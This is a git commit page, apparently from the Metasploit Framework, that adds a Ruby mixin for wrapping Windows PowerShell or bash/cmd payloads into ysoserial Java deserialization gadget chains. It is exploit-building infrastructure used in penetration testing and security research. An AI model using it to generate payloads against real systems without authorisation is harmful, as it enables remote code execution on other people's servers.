Add a new Java Deserialization mixin and use it to set the shell
This commit is contained in:
Spencer McIntyre
committed by
Shelby Pace
Shelby Pace
parent
2bd6b7abc7
commit
8d2e644f4f
@@ -0,0 +1,44 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Msf
|
||||
|
||||
module Exploit::JavaDeserialization
|
||||
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
def generate_java_deserialization_for_command(name, shell, command)
|
||||
# here we force usage of a modified type to avoid compatibility issues with command characters thar are present in
|
||||
# some ysoserial payloads
|
||||
unless %w{ bash cmd powershell }.include? shell
|
||||
raise RuntimeError, 'Invalid shell for Java Deserialization payload generation'
|
||||
end
|
||||
|
||||
Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: shell)
|
||||
end
|
||||
|
||||
def generate_java_deserialization_for_payload(name, payload)
|
||||
command = nil
|
||||
|
||||
if payload.platform.platforms == [Msf::Module::Platform::Windows]
|
||||
if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
|
||||
command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true, encode_final_payload: true })
|
||||
elsif payload.arch.first == Rex::Arch::ARCH_CMD
|
||||
command = payload.encoded
|
||||
end
|
||||
modified_type = 'cmd'
|
||||
else
|
||||
if payload.arch.first == Rex::Arch::ARCH_CMD
|
||||
command = payload.encoded
|
||||
end
|
||||
modified_type = 'bash'
|
||||
end
|
||||
|
||||
if command.nil?
|
||||
raise RuntimeError, 'Could not generate the payload for the platform/architecture combination'
|
||||
end
|
||||
|
||||
Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: modified_type)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
Reference in New Issue
Block a user